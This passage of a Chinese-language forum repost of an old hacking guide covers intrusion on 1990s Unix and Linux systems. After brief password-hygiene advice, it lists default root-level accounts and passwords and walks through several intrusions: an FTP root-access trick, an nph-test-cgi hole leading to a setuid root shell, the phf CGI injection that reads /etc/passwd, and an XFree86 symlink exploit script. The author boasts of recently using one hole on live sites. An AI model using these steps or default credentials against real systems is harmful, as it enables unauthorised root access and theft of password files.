最后这点是十分重要的,永远不要对自己的口令过于自信,也许就在无意当中泄露了口令.定期地改变口令,会使自己遭受黑客攻击的风险降到了一定限度之内.一旦发现自己的口令不能进入计算机系统,应立即向系统管理员报告,由管理员来检查原因.

系统管理员也应定期运行这些破译口令的工具,来尝试破译shadow文件,若有用户的口令密码被破译出,说明这些用户的密码取得过于简单或有规律可循,应尽快地通知他们,及时更正密码,以防止黑客的入侵.

示列四:

一般一个系统第一次安装时会有一些default帐号和密码:

ACCOUNT     PASSWORD
----------- ----------------
root        root
sys        sys/system/bin
bin        sys/bin
mountfsys   mountfsys
adm        adm
uucp        uucp
nuucp       anon
anon        anon
user        user
games       games
install     install
reboot      给 "command login" 用的
demo        demo
umountfsys  umountfsys
sync        sync
admin       admin
guest       guest
daemon      daemon

其中 root, mountfsys, umountfsys, install (有时候sync也是)等都是root level帐号, 也就是拥有sysop (系统管理者)的权限, 完全的权限!!! 当你尝试签入某些系统时这些原始帐号及密码都是很好的方向, 特别是如果碰到那些少根筋的系统管理者, 嘿嘿! 搞不好你就莫明其妙当了root user 了!!!

示列五: FTP入侵法??不太实用的方法 !!

[1] 连接到FTP Server.
[2] 当系统要求你输入User Name 时 [Enter] 不 管 它
[3] Password输 入 --> "quote user ftp"
[4] 接著再输入 --> "quote cwd ~root"
[5] 再输入 --> "quote pass ftp"

这种方法似乎只能用在很老旧的FTP Server上 , 以国内目前的机器应该都不会成功的 , 如果你想要试试的话 , 找找国外大学的FTP Server 试试看吧!!依照上面的步骤会产生甚么样的结果?? ——你就是root啦 !!

示列六: Linux 1.2.13 漏 洞 之 一 ?? 成 为 root 吧 !!

Linux 1.2.13有许多的漏洞 , 如果你所使用的版本是较新的话 , 你大可放心 ,不然你也可以依照下面的方法试试你的系统 !!

[1] Telnet 到 yournet.net
[2] Login之后输入 --> "finger @yournet.net"
[3] 再 --> "finger root@yournet.net" 等 root 来 login
[4] 用 WWW Browser 连 到 http://www.yournet.net
[5] Location 输 入 --> "www.yournet.net/cgi-bin/nph-test-cgi/*"
[6] 回 到 Telnet 软 体 --> "cp /bin/sh /tmp/.sh"
[7] 再 输 入 --> "chmod 4755 /tmp/.sh" (You're root now!!)

至于其它Linux的System Holes, 有机会再慢慢谈罗 !! 当然已经有许多文件讲到了 !!

示列七: 可以用WWW Browser抓/etc/passwd???那当然 !!

[1] 用 WWW Browser 连 到 yournet.net
[2] Location 输 入 --> "www.yournet.net/cgi-bin/nph-test-cgi?*"
[3] 接著如果出来一份像Report的画面的话 , 接著输入
/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
[4] 发生了甚么事 ?? etc/passwd 在你的浏览器中" 显示 "出来了!!快点Save吧!!

这个方法管不管用 ?? 依各系统所使用的 WWW Server 软体不同而有差异 , 所以如果你在选购WWW Server 软体的时候也请注意一下它的安全性 , 不一定名牌的就好 , 像这个Hole... 当然这个方法曾经管用过 , 至少两天前还试过它可以破解一两个" 网路咖啡 " 的站台(<--- 又是 ,
安全性值得讨论)!!

示列八: Xfree86 3.1.2有个漏洞能让别人删除"任何"档案 ?是 的 ! 包 括 etc/passwd 用这个Script试试看 ...

--- cut here, start code exploit.sh --------------------
!/bin/sh
echo Running exploit to check the Xfree86 3.1.2 hole!
echo Creating file called /tmp/blah which will contain a few words.
echo "This version is NOT exploitable!" >/tmp/blah
ln -s /tmp/blash /tmp/.tX0-lock
startx
echo Now Check /tmp/blah and if it says:
echo \"This version is NOT exploitable!\"
echo then the version you have is not exploitable!
echo Otherwise, it should have a few numbers, then it is exploitable!


--- cut here, end of code exploit.sh -------------------

要怎么补这个漏洞呢 ????

[1] 将它设成superuser 才能执行 ! 用 chmod 4700 指令 .
[2] 作一个group, 只将值得相信的人加入此 group, 使该档案属此group才能执行 .
[3] 更新新版的Xfree86, 可在 http://www.x.org 下载 .

新塘新世界花园业主论坛:http://gz.focus.cn/msglist/23465
原帖链接 http://gz.focus.cn/msgview/23465/16355097.html

缘煦的签名档

I AM TURE COLOR MAN